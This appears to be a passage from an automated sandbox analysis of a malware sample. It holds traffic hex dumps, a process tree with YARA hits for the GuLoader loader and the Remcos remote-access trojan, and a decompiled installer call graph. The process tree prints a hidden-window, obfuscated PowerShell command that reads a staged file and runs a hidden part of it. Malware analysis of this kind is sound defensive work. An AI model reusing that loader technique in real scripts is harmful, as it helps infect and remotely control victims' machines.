                                                                              2025-01-10 22:50:09 UTC1390INData Raw: f7 ad 48 de 8a 50 23 2a 8c ed 12 36 27 4e f1 3f 8a bc 9b 87 ad 4d a3 dd 10 44 41 b4 af 50 79 9e 13 77 2b 34 0d d5 00 85 a3 d7 8b b9 3b 9e 13 7e 28 fb f7 1e 46 0e 51 9a ee 68 6b ec c2 6b 0e 4a 45 69 29 f1 f0 2c 6b 9d ae 0a 0f 1c e3 ca ef 5b 56 50 62 4d 99 c8 d8 2d c1 ca 0a 9e 2d d5 21 ff 92 02 f6 0c ae 6a 1e f1 b9 25 fd 10 f5 7e 00 2e 81 0d ac 42 11 8d 4a 0b 89 10 9d c7 f9 4e a0 3e 68 e9 18 84 a1 52 f7 1d ee 9d 64 70 21 c8 72 aa bb cb b4 38 01 df a0 28 4c 94 ec 0d b8 18 dd d1 ac 55 94 49 4d 71 4d 4d 69 35 44 ae 76 ff 0c 68 2f ee 09 20 1c 8d 26 86 df 6e 71 7d 00 45 00 61 d5 d3 84 27 d7 e2 99 3e b1 31 2d fb b2 50 e3 ff 87 83 00 f6 83 bc c1 c2 0a dd a9 db b1 8f 30 c7 5f b2 ec cd 4f 8a 99 bf 85 aa ef 73 51 21 7a ec 15 d0 ed 9a d4 35 7b 36 cb c9 14 67 7c 15 c3
                                                                              Data Ascii: HP#*6'N?MDAPyw+4;~(FQhkkJEi),k[VPbM--!j%~.BJN>hRdp!r8(LUIMqMMi5Dvh/ &nq}Ea'>1-P0_OsQ!z5{6g|
                                                                              2025-01-10 22:50:09 UTC1390INData Raw: 36 fb c9 6a 2a ae 98 f3 57 3f 37 68 f8 5f 28 09 fe 39 a3 ee ac f1 13 3c 90 0c a2 26 2d ca 21 7d c3 fc 98 25 83 1f c3 b5 7c fa 79 87 93 4c 1c a0 5a e8 a1 28 f0 b4 4c 96 45 13 07 e8 40 90 e7 cc 98 b0 af 47 fe 16 a6 50 1f a5 aa 87 c1 0a 92 b5 3c 48 11 0d 47 13 9f 08 09 80 58 c4 93 cd 39 48 9f cc e5 d2 37 81 64 b0 a4 10 25 c7 b5 58 6a 98 a6 41 a3 72 8a bc df 85 97 97 73 30 ed 2c 41 65 81 54 0d 3d 64 55 ac 34 68 28 b9 b3 dd 54 dd cf 00 01 40 c1 df e4 da bf 29 d5 41 f8 3e 24 a0 cf 91 2b 6d ad ae e3 38 ee fb e6 65 c4 db 18 42 aa fe 67 80 1f 32 29 a2 ad 3f 74 76 e4 ae ac 15 ad 6a 1e 73 c1 65 58 5a c3 57 7b 87 ce 7f 52 6d d2 2a a8 04 34 61 8c b2 5d 1c 71 06 14 ff 26 36 8e c8 2e ce c1 8e 45 66 f7 ca 92 47 a4 5c 0b 87 89 57 32 a6 b0 9e dc e7 a8 ca 75 8a aa 24 80 80
                                                                              Data Ascii: 6j*W?7h_(9<&-!}%|yLZ(LE@GP<HGX9H7d%XjArs0,AeT=dU4h(T@)A>$+m8eBg2)?tvjseXZW{Rm*4a]q&6.EfG\W2u$
                                                                              2025-01-10 22:50:09 UTC1390INData Raw: f8 05 84 d4 0d 50 81 9d df 94 a1 fa 2b 11 e6 e4 0a ee 41 35 7b f4 ed c9 14 ba c7 65 f3 55 b4 45 f1 3b fd 8f 69 19 b7 e5 ce fe 05 c3 17 60 60 d4 17 49 17 bb cc 92 b1 3b 91 e3 42 1f c2 55 fa 23 7d a9 f8 3b f2 1e f3 02 8f 43 a1 2d 2a ca 01 4a 6d 73 a4 99 a1 e6 3c d8 15 5c 46 6e 55 0a e3 5e 87 fb e4 2c c7 13 4b 96 be 56 c4 13 d4 c6 f5 86 a4 01 29 84 d5 a8 7c 6d 5d 8f 8c 39 68 64 fd 64 03 51 0c f3 07 48 bf a4 bc 07 ec ff 63 11 cc ee 07 0a 9b 1d bd 13 cf 72 f5 f5 cb ca 3d 2c 2b 5d 7c ca 5f e5 60 92 74 19 01 5f cd 40 4d f2 00 53 be 02 cd 14 ed 7c a4 9b 14 89 c8 ea e7 a6 97 15 c1 4d 80 17 aa bf 83 93 8f 22 15 98 b0 9e 8e ef 80 eb dd 95 33 3f fa d4 57 f7 0a e5 2c 97 7f e6 44 ba 89 44 21 7f 55 60 72 5a a8 58 57 51 00 48 64 f2 eb 38 35 0d f9 3a 59 27 d1 b7 66 d8 3c
                                                                              Data Ascii: P+A5{eUE;i``I;BU#};C-*Jms<\FnU^,KV)|m]9hddQHcr=,+]|_`t_@MS|M"3?W,DD!U`rZXWQHd85:Y'f<
                                                                              2025-01-10 22:50:09 UTC1390INData Raw: 45 0f 5e 6c 85 7c 1f 9a 6d e2 12 1f e5 55 10 72 15 3d 30 03 65 bf de 2b 62 60 6f 93 6b 43 9b b4 d1 06 da 69 e3 3c ad dd f5 37 65 35 99 99 16 47 0d c4 b9 eb 08 cf c6 6b 8d de 65 83 39 be e2 35 f3 a7 14 66 2e dc ef 0a e2 b1 0c e7 2c df b4 3c e6 24 c1 1f 9c 93 c4 fb ad 95 eb 70 99 03 21 ec 26 49 ae db 30 82 31 53 08 1f 36 0e 59 b0 8b 44 1c 72 38 e4 a3 21 24 e9 39 68 b4 21 ea a0 90 f8 18 61 c6 22 f4 34 b1 a9 4f 09 65 99 ac 8c 9f a9 ab 99 3a f8 ce d7 f6 ee b7 5f 3a 72 84 20 68 bc 56 39 bb 05 e0 5b 86 a5 7e 8e a4 ad 78 62 ef 4d bd 6b f1 2a c6 7a 64 1f 51 05 66 8b a2 12 a0 88 8a 6a fb 13 37 bd 1d b8 3a a2 28 f1 ae 1a fd c6 07 c2 d1 09 57 55 3b 99 28 b8 42 b7 5a 91 39 2d 77 9e fc 7f 6d 00 9c 7e 0d f2 df 1a ba 30 0b 8f be e0 fc 4f 72 70 8b e8 d2 76 35 e0 f2 40 dd
                                                                              Data Ascii: E^l|mUr=0e+b`okCi<7e5Gke95f.,<$p!&I01S6YDr8!$9h!a"4Oe:_:r hV9[~xbMk*zdQfj7:(WU;(BZ9-wm~0Orpv5@
                                                                              2025-01-10 22:50:09 UTC1390INData Raw: a9 b7 e4 b7 fa 03 2d 7f d4 5f c0 3d 84 88 10 7e 4f d1 ed 8d 04 c5 31 8b ae b6 66 d8 f1 2e bd d2 af 5b e8 a7 41 02 1d 3a 87 ca 09 fd 55 4c 98 8c f0 db 01 a9 5b b1 91 eb ad e3 01 5f b9 fe 7d 87 e4 0e 2a 8a ea fe 5a ae c3 c5 24 fe 39 32 a6 72 7a 89 f9 c8 d5 21 40 75 a4 d4 c2 1f e0 ae d1 75 0d b1 0d 1b 23 4c 56 11 60 f9 a6 9e 9d 2d c5 be 43 cf f2 71 50 5a 56 0d f6 41 65 5d 93 d0 18 0c d6 5d 60 dd a3 59 f9 af 0b 1f 33 39 57 b6 de 1f 32 9c 7f 23 ef f5 c6 a9 e1 b6 86 e3 04 64 47 37 dc 45 08 dd 18 93 55 e8 ea d0 4b 6b f6 0a 18 a9 21 95 9f de b5 c7 e8 03 15 cb 6f b2 14 1a 9f 32 94 15 31 73 ee 30 de 2c 92 8f ae 80 0d e7 79 ed 21 54 ed 51 58 dd 14 56 72 b9 ce fe 2e f1 29 f2 6b 09 5a 30 46 62 54 8c 71 96 ff 45 21 70 f5 10 50 5a da c5 20 99 2e 61 e5 cf 19 be d4 c9 a5
                                                                              Data Ascii: -_=~O1f.[A:UL[_}*Z$92rz!@uu#LV`-CqPZVAe]]`Y39W2#dG7EUKk!o21s0,y!TQXVr.)kZ0FbTqE!pPZ .a
                                                                              2025-01-10 22:50:09 UTC1390INData Raw: 16 c4 0f 17 63 89 d1 90 42 08 32 27 13 5c 79 ec 5d 60 dd af 3c 56 db 2c f7 67 02 f1 10 0b bc d5 f1 e5 20 ef 76 51 cf 61 1c f1 96 50 64 4f 37 c4 fd c0 ee f2 28 e5 eb ce 49 08 88 6b be 5c 8d 0d e1 27 ab f1 b5 d0 03 1d 76 92 4f 5e a9 44 5e f1 26 d9 a8 f9 b4 f5 cb e6 ce b3 5b 41 2b b8 78 53 ef f0 13 76 4f ab c3 a9 5e 29 f2 8f 2a 20 b5 e6 6d 1e 41 b9 9d d9 a8 25 fb 32 b5 21 ca 65 ee af 84 e2 26 39 be 42 d0 15 01 27 f9 84 a9 6f 3c 5a 29 a5 b9 fc cf 9c 6e ae 41 ed 4f 4d fa c4 08 a6 ea 93 ac f6 f7 c0 fa 4e 09 c3 e1 c9 10 ce 5e d6 4f 88 8d e7 e2 22 c8 97 f2 9a 6d b2 ff df 6e 74 8d cd 13 b1 26 48 07 1a 3f 53 a0 84 4e ef d4 97 1a 3a a7 d1 83 a9 74 9b 8c 3e 3e ee 22 e7 9e 2e ab 06 7d 5f 89 ac 05 f4 26 51 5b a9 58 92 e5 d5 f6 7d 2a ef 24 de 71 21 91 8b a0 a8 62 50 3a
                                                                              Data Ascii: cB2'\y]`<V,g vQaPdO7(Ik\'vO^D^&[A+xSvO^)* mA%2!e&9B'o<Z)nAOMN^O"mnt&H?SN:t>>".}_&Q[X}*$q!bP:


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:17:49:38
                                                                              Start date:10/01/2025
                                                                              Path:C:\Users\user\Desktop\WtZl31OLfA.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\WtZl31OLfA.exe"
                                                                              Imagebase:0x400000
                                                                              File size:777'513 bytes
                                                                              MD5 hash:74C8F736D425B1BD2027C2B5B144E188
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:1
                                                                              Start time:17:49:38
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:powershell.exe -windowstyle hidden "$Ekstremumspunktet32=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Arbejdsbesparelsernes40\Kbmand.Too';$byelaws=$Ekstremumspunktet32.SubString(71187,3);.$byelaws($Ekstremumspunktet32) "
                                                                              Imagebase:0xc50000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2297304332.000000000A291000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:17:49:38
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:17:50:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                              Imagebase:0x380000
                                                                              File size:59'904 bytes
                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4503566716.0000000005DAC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:23.9%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:21.2%
                                                                                Total number of Nodes:1310
                                                                                Total number of Limit Nodes:39
                                                                                execution_graph 3650 402840 3651 402bbf 18 API calls 3650->3651 3653 40284e 3651->3653 3652 402864 3655 405c00 2 API calls 3652->3655 3653->3652 3654 402bbf 18 API calls 3653->3654 3654->3652 3656 40286a 3655->3656 3678 405c25 GetFileAttributesW CreateFileW 3656->3678 3658 402877 3659 402883 GlobalAlloc 3658->3659 3660 40291a 3658->3660 3663 402911 CloseHandle 3659->3663 3664 40289c 3659->3664 3661 402922 DeleteFileW 3660->3661 3662 402935 3660->3662 3661->3662 3663->3660 3679 403258 SetFilePointer 3664->3679 3666 4028a2 3667 403242 ReadFile 3666->3667 3668 4028ab GlobalAlloc 3667->3668 3669 4028bb 3668->3669 3670 4028ef 3668->3670 3671 403027 32 API calls 3669->3671 3672 405cd7 WriteFile 3670->3672 3676 4028c8 3671->3676 3673 4028fb GlobalFree 3672->3673 3674 403027 32 API calls 3673->3674 3677 40290e 3674->3677 3675 4028e6 GlobalFree 3675->3670 3676->3675 3677->3663 3678->3658 3679->3666 3680 401cc0 3681 402ba2 18 API calls 3680->3681 3682 401cc7 3681->3682 3683 402ba2 18 API calls 3682->3683 3684 401ccf GetDlgItem 3683->3684 3685 402531 3684->3685 3686 4029c0 3687 402ba2 18 API calls 3686->3687 3688 4029c6 3687->3688 3689 4029d4 3688->3689 3690 4029f9 3688->3690 3692 40281e 3688->3692 3689->3692 3694 405f97 wsprintfW 3689->3694 3691 406072 18 API calls 3690->3691 3690->3692 3691->3692 3694->3692 3300 401fc3 3301 401fd5 3300->3301 3302 402087 3300->3302 3320 402bbf 3301->3320 3304 401423 25 API calls 3302->3304 3311 4021e1 3304->3311 3306 402bbf 18 API calls 3307 401fe5 3306->3307 3308 401ffb LoadLibraryExW 3307->3308 3309 401fed GetModuleHandleW 3307->3309 3308->3302 3310 40200c 3308->3310 3309->3308 3309->3310 3326 406499 WideCharToMultiByte 3310->3326 3314 402056 3316 4051af 25 API calls 3314->3316 3315 40201d 3318 40202d 3315->3318 3329 401423 3315->3329 3316->3318 3318->3311 3319 402079 FreeLibrary 3318->3319 3319->3311 3321 402bcb 3320->3321 3322 406072 18 API calls 3321->3322 3323 402bec 3322->3323 3324 401fdc 3323->3324 3325 4062e4 5 API calls 3323->3325 3324->3306 3325->3324 3327 4064c3 GetProcAddress 3326->3327 3328 402017 3326->3328 3327->3328 3328->3314 3328->3315 3330 4051af 25 API calls 3329->3330 3331 401431 3330->3331 3331->3318 3695 4016c4 3696 402bbf 18 API calls 3695->3696 3697 4016ca GetFullPathNameW 3696->3697 3698 4016e4 3697->3698 3699 401706 3697->3699 3698->3699 3702 406393 2 API calls 3698->3702 3700 40171b GetShortPathNameW 3699->3700 3701 402a4c 3699->3701 3700->3701 3703 4016f6 3702->3703 3703->3699 3705 406050 lstrcpynW 3703->3705 3705->3699 3706 4014cb 3707 4051af 25 API calls 3706->3707 3708 4014d2 3707->3708 3709 40194e 3710 402bbf 18 API calls 3709->3710 3711 401955 lstrlenW 3710->3711 3712 402531 3711->3712 3713 4027ce 3714 4027d6 3713->3714 3715 4027da FindNextFileW 3714->3715 3717 4027ec 3714->3717 3716 402833 3715->3716 3715->3717 3719 406050 lstrcpynW 3716->3719 3719->3717 3461 401754 3462 402bbf 18 API calls 3461->3462 3463 40175b 3462->3463 3464 405c54 2 API calls 3463->3464 3465 401762 3464->3465 3466 405c54 2 API calls 3465->3466 3466->3465 3720 401d56 GetDC GetDeviceCaps 3721 402ba2 18 API calls 3720->3721 3722 401d74 MulDiv ReleaseDC 3721->3722 3723 402ba2 18 API calls 3722->3723 3724 401d93 3723->3724 3725 406072 18 API calls 3724->3725 3726 401dcc CreateFontIndirectW 3725->3726 3727 402531 3726->3727 3728 401a57 3729 402ba2 18 API calls 3728->3729 3730 401a5d 3729->3730 3731 402ba2 18 API calls 3730->3731 3732 401a05 3731->3732 3733 403857 3734 403862 3733->3734 3735 403866 3734->3735 3736 403869 GlobalAlloc 3734->3736 3736->3735 3737 4014d7 3738 402ba2 18 API calls 3737->3738 3739 4014dd Sleep 3738->3739 3741 402a4c 3739->3741 3742 40155b 3743 4029f2 3742->3743 3746 405f97 wsprintfW 3743->3746 3745 4029f7 3746->3745 3507 401ddc 3515 402ba2 3507->3515 3509 401de2 3510 402ba2 18 API calls 3509->3510 3511 401deb 3510->3511 3512 401df2 ShowWindow 3511->3512 3513 401dfd EnableWindow 3511->3513 3514 402a4c 3512->3514 3513->3514 3516 406072 18 API calls 3515->3516 3517 402bb6 3516->3517 3517->3509 3601 401bdf 3602 402ba2 18 API calls 3601->3602 3603 401be6 3602->3603 3604 402ba2 18 API calls 3603->3604 3605 401bf0 3604->3605 3606 401c00 3605->3606 3608 402bbf 18 API calls 3605->3608 3607 401c10 3606->3607 3609 402bbf 18 API calls 3606->3609 3610 401c1b 3607->3610 3611 401c5f 3607->3611 3608->3606 3609->3607 3612 402ba2 18 API calls 3610->3612 3613 402bbf 18 API calls 3611->3613 3614 401c20 3612->3614 3615 401c64 3613->3615 3616 402ba2 18 API calls 3614->3616 3617 402bbf 18 API calls 3615->3617 3619 401c29 3616->3619 3618 401c6d FindWindowExW 3617->3618 3622 401c8f 3618->3622 3620 401c31 SendMessageTimeoutW 3619->3620 3621 401c4f SendMessageW 3619->3621 3620->3622 3621->3622 3747 4022df 3748 402bbf 18 API calls 3747->3748 3749 4022ee 3748->3749 3750 402bbf 18 API calls 3749->3750 3751 4022f7 3750->3751 3752 402bbf 18 API calls 3751->3752 3753 402301 GetPrivateProfileStringW 3752->3753 3754 401960 3755 402ba2 18 API calls 3754->3755 3756 401967 3755->3756 3757 402ba2 18 API calls 3756->3757 3758 401971 3757->3758 3759 402bbf 18 API calls 3758->3759 3760 40197a 3759->3760 3761 40198e lstrlenW 3760->3761 3763 4019ca 3760->3763 3762 401998 3761->3762 3762->3763 3767 406050 lstrcpynW 3762->3767 3765 4019b3 3765->3763 3766 4019c0 lstrlenW 3765->3766 3766->3763 3767->3765 3768 404262 lstrlenW 3769 404281 3768->3769 3770 404283 WideCharToMultiByte 3768->3770 3769->3770 3771 401662 3772 402bbf 18 API calls 3771->3772 3773 401668 3772->3773 3774 406393 2 API calls 3773->3774 3775 40166e 3774->3775 3776 4019e4 3777 402bbf 18 API calls 3776->3777 3778 4019eb 3777->3778 3779 402bbf 18 API calls 3778->3779 3780 4019f4 3779->3780 3781 4019fb lstrcmpiW 3780->3781 3782 401a0d lstrcmpW 3780->3782 3783 401a01 3781->3783 3782->3783 3784 4025e5 3785 402ba2 18 API calls 3784->3785 3794 4025f4 3785->3794 3786 40272d 3787 40263a ReadFile 3787->3786 3787->3794 3788 405ca8 ReadFile 3788->3794 3790 40267a MultiByteToWideChar 3790->3794 3791 40272f 3806 405f97 wsprintfW 3791->3806 3793 4026a0 SetFilePointer MultiByteToWideChar 3793->3794 3794->3786 3794->3787 3794->3788 3794->3790 3794->3791 3794->3793 3795 402740 3794->3795 3797 405d06 SetFilePointer 3794->3797 3795->3786 3796 402761 SetFilePointer 3795->3796 3796->3786 3798 405d22 3797->3798 3803 405d3e 3797->3803 3799 405ca8 ReadFile 3798->3799 3800 405d2e 3799->3800 3801 405d47 SetFilePointer 3800->3801 3802 405d6f SetFilePointer 3800->3802 3800->3803 3801->3802 3804 405d52 3801->3804 3802->3803 3803->3794 3805 405cd7 WriteFile 3804->3805 3805->3803 3806->3786 3332 401e66 3333 402bbf 18 API calls 3332->3333 3334 401e6c 3333->3334 3335 4051af 25 API calls 3334->3335 3336 401e76 3335->3336 3337 405730 2 API calls 3336->3337 3338 401e7c 3337->3338 3339 40281e 3338->3339 3340 401edb CloseHandle 3338->3340 3341 401e8c WaitForSingleObject 3338->3341 3340->3339 3343 401e9e 3341->3343 3342 401eb0 GetExitCodeProcess 3345 401ec2 3342->3345 3346 401ecf 3342->3346 3343->3342 3344 406466 2 API calls 3343->3344 3349 401ea5 WaitForSingleObject 3344->3349 3350 405f97 wsprintfW 3345->3350 3346->3340 3348 401ecd 3346->3348 3348->3340 3349->3343 3350->3348 3351 401767 3352 402bbf 18 API calls 3351->3352 3353 40176e 3352->3353 3354 401796 3353->3354 3355 40178e 3353->3355 3391 406050 lstrcpynW 3354->3391 3390 406050 lstrcpynW 3355->3390 3358 401794 3362 4062e4 5 API calls 3358->3362 3359 4017a1 3360 405a04 3 API calls 3359->3360 3361 4017a7 lstrcatW 3360->3361 3361->3358 3372 4017b3 3362->3372 3363 406393 2 API calls 3363->3372 3364 405c00 2 API calls 3364->3372 3366 4017c5 CompareFileTime 3366->3372 3367 401885 3368 4051af 25 API calls 3367->3368 3370 40188f 3368->3370 3369 4051af 25 API calls 3371 401871 3369->3371 3373 403027 32 API calls 3370->3373 3372->3363 3372->3364 3372->3366 3372->3367 3377 406072 18 API calls 3372->3377 3381 406050 lstrcpynW 3372->3381 3386 405795 MessageBoxIndirectW 3372->3386 3387 40185c 3372->3387 3389 405c25 GetFileAttributesW CreateFileW 3372->3389 3374 4018a2 3373->3374 3375 4018b6 SetFileTime 3374->3375 3376 4018c8 CloseHandle 3374->3376 3375->3376 3376->3371 3378 4018d9 3376->3378 3377->3372 3379 4018f1 3378->3379 3380 4018de 3378->3380 3383 406072 18 API calls 3379->3383 3382 406072 18 API calls 3380->3382 3381->3372 3384 4018e6 lstrcatW 3382->3384 3385 4018f9 3383->3385 3384->3385 3388 405795 MessageBoxIndirectW 3385->3388 3386->3372 3387->3369 3387->3371 3388->3371 3389->3372 3390->3358 3391->3359 3807 404568 3808 404578 3807->3808 3809 40459e 3807->3809 3811 404114 19 API calls 3808->3811 3810 40417b 8 API calls 3809->3810 3812 4045aa 3810->3812 3813 404585 SetDlgItemTextW 3811->3813 3813->3809 3814 401ee9 3815 402bbf 18 API calls 3814->3815 3816 401ef0 3815->3816 3817 406393 2 API calls 3816->3817 3818 401ef6 3817->3818 3820 401f07 3818->3820 3821 405f97 wsprintfW 3818->3821 3821->3820 3822 4021ea 3823 402bbf 18 API calls 3822->3823 3824 4021f0 3823->3824 3825 402bbf 18 API calls 3824->3825 3826 4021f9 3825->3826 3827 402bbf 18 API calls 3826->3827 3828 402202 3827->3828 3829 406393 2 API calls 3828->3829 3830 40220b 3829->3830 3831 40221c lstrlenW lstrlenW 3830->3831 3832 40220f 3830->3832 3834 4051af 25 API calls 3831->3834 3833 4051af 25 API calls 3832->3833 3835 402217 3832->3835 3833->3835 3836 40225a SHFileOperationW 3834->3836 3836->3832 3836->3835 3837 40156b 3838 401584 3837->3838 3839 40157b ShowWindow 3837->3839 3840 401592 ShowWindow 3838->3840 3841 402a4c 3838->3841 3839->3838 3840->3841 3392 4052ee 3393 405498 3392->3393 3394 40530f GetDlgItem GetDlgItem GetDlgItem 3392->3394 3396 4054a1 GetDlgItem CreateThread CloseHandle 3393->3396 3397 4054c9 3393->3397 3437 404149 SendMessageW 3394->3437 3396->3397 3460 405282 5 API calls 3396->3460 3399 4054e0 ShowWindow ShowWindow 3397->3399 3400 405519 3397->3400 3401 4054f4 3397->3401 3398 40537f 3403 405386 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3398->3403 3442 404149 SendMessageW 3399->3442 3446 40417b 3400->3446 3402 405554 3401->3402 3405 405508 3401->3405 3406 40552e ShowWindow 3401->3406 3402->3400 3412 405562 SendMessageW 3402->3412 3410 4053f4 3403->3410 3411 4053d8 SendMessageW SendMessageW 3403->3411 3443 4040ed 3405->3443 3408 405540 3406->3408 3409 40554e 3406->3409 3415 4051af 25 API calls 3408->3415 3416 4040ed SendMessageW 3409->3416 3417 405407 3410->3417 3418 4053f9 SendMessageW 3410->3418 3411->3410 3414 405527 3412->3414 3419 40557b CreatePopupMenu 3412->3419 3415->3409 3416->3402 3438 404114 3417->3438 3418->3417 3420 406072 18 API calls 3419->3420 3422 40558b AppendMenuW 3420->3422 3424 4055a8 GetWindowRect 3422->3424 3425 4055bb TrackPopupMenu 3422->3425 3423 405417 3426 405420 ShowWindow 3423->3426 3427 405454 GetDlgItem SendMessageW 3423->3427 3424->3425 3425->3414 3429 4055d6 3425->3429 3430 405436 ShowWindow 3426->3430 3432 405443 3426->3432 3427->3414 3428 40547b SendMessageW SendMessageW 3427->3428 3428->3414 3431 4055f2 SendMessageW 3429->3431 3430->3432 3431->3431 3433 40560f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3431->3433 3441 404149 SendMessageW 3432->3441 3435 405634 SendMessageW 3433->3435 3435->3435 3436 40565d GlobalUnlock SetClipboardData CloseClipboard 3435->3436 3436->3414 3437->3398 3439 406072 18 API calls 3438->3439 3440 40411f SetDlgItemTextW 3439->3440 3440->3423 3441->3427 3442->3401 3444 4040f4 3443->3444 3445 4040fa SendMessageW 3443->3445 3444->3445 3445->3400 3447 404193 GetWindowLongW 3446->3447 3457 40421c 3446->3457 3448 4041a4 3447->3448 3447->3457 3449 4041b3 GetSysColor 3448->3449 3450 4041b6 3448->3450 3449->3450 3451 4041c6 SetBkMode 3450->3451 3452 4041bc SetTextColor 3450->3452 3453 4041e4 3451->3453 3454 4041de GetSysColor 3451->3454 3452->3451 3455 4041f5 3453->3455 3456 4041eb SetBkColor 3453->3456 3454->3453 3455->3457 3458 404208 DeleteObject 3455->3458 3459 40420f CreateBrushIndirect 3455->3459 3456->3455 3457->3414 3458->3459 3459->3457 3842 40226e 3843 402275 3842->3843 3847 402288 3842->3847 3844 406072 18 API calls 3843->3844 3845 402282 3844->3845 3846 405795 MessageBoxIndirectW 3845->3846 3846->3847 3848 4014f1 SetForegroundWindow 3849 402a4c 3848->3849 3850 401673 3851 402bbf 18 API calls 3850->3851 3852 40167a 3851->3852 3853 402bbf 18 API calls 3852->3853 3854 401683 3853->3854 3855 402bbf 18 API calls 3854->3855 3856 40168c MoveFileW 3855->3856 3857 401698 3856->3857 3858 40169f 3856->3858 3859 401423 25 API calls 3857->3859 3860 406393 2 API calls 3858->3860 3862 4021e1 3858->3862 3859->3862 3861 4016ae 3860->3861 3861->3862 3863 405ef1 38 API calls 3861->3863 3863->3857 3864 401cfa GetDlgItem GetClientRect 3865 402bbf 18 API calls 3864->3865 3866 401d2c LoadImageW SendMessageW 3865->3866 3867 401d4a DeleteObject 3866->3867 3868 402a4c 3866->3868 3867->3868 3493 4027fb 3494 402bbf 18 API calls 3493->3494 3495 402802 FindFirstFileW 3494->3495 3496 402815 3495->3496 3497 40282a 3495->3497 3498 402833 3497->3498 3501 405f97 wsprintfW 3497->3501 3502 406050 lstrcpynW 3498->3502 3501->3498 3502->3496 3869 40237b 3870 402381 3869->3870 3871 402bbf 18 API calls 3870->3871 3872 402393 3871->3872 3873 402bbf 18 API calls 3872->3873 3874 40239d RegCreateKeyExW 3873->3874 3875 4023c7 3874->3875 3876 402a4c 3874->3876 3877 4023e2 3875->3877 3878 402bbf 18 API calls 3875->3878 3879 4023ee 3877->3879 3881 402ba2 18 API calls 3877->3881 3880 4023d8 lstrlenW 3878->3880 3882 402409 RegSetValueExW 3879->3882 3883 403027 32 API calls 3879->3883 3880->3877 3881->3879 3884 40241f RegCloseKey 3882->3884 3883->3882 3884->3876 3886 4014ff 3887 401507 3886->3887 3888 40151a 3886->3888 3889 402ba2 18 API calls 3887->3889 3889->3888 3890 401000 3891 401037 BeginPaint GetClientRect 3890->3891 3893 40100c DefWindowProcW 3890->3893 3894 4010f3 3891->3894 3895 401179 3893->3895 3896 401073 CreateBrushIndirect FillRect DeleteObject 3894->3896 3897 4010fc 3894->3897 3896->3894 3898 401102 CreateFontIndirectW 3897->3898 3899 401167 EndPaint 3897->3899 3898->3899 3900 401112 6 API calls 3898->3900 3899->3895 3900->3899 3901 401904 3902 40193b 3901->3902 3903 402bbf 18 API calls 3902->3903 3904 401940 3903->3904 3905 405841 69 API calls 3904->3905 3906 401949 3905->3906 3907 402d04 3908 402d16 SetTimer 3907->3908 3909 402d2f 3907->3909 3908->3909 3910 402d84 3909->3910 3911 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3909->3911 3911->3910 3912 404905 3913 404931 3912->3913 3914 404915 3912->3914 3916 404964 3913->3916 3917 404937 SHGetPathFromIDListW 3913->3917 3923 405779 GetDlgItemTextW 3914->3923 3919 40494e SendMessageW 3917->3919 3920 404947 3917->3920 3918 404922 SendMessageW 3918->3913 3919->3916 3921 40140b 2 API calls 3920->3921 3921->3919 3923->3918 3924 402786 3925 4029f7 3924->3925 3926 40278d 3924->3926 3927 402ba2 18 API calls 3926->3927 3928 402798 3927->3928 3929 40279f SetFilePointer 3928->3929 3929->3925 3930 4027af 3929->3930 3932 405f97 wsprintfW 3930->3932 3932->3925 3933 401907 3934 402bbf 18 API calls 3933->3934 3935 40190e 3934->3935 3936 405795 MessageBoxIndirectW 3935->3936 3937 401917 3936->3937 3938 401e08 3939 402bbf 18 API calls 3938->3939 3940 401e0e 3939->3940 3941 402bbf 18 API calls 3940->3941 3942 401e17 3941->3942 3943 402bbf 18 API calls 3942->3943 3944 401e20 3943->3944 3945 402bbf 18 API calls 3944->3945 3946 401e29 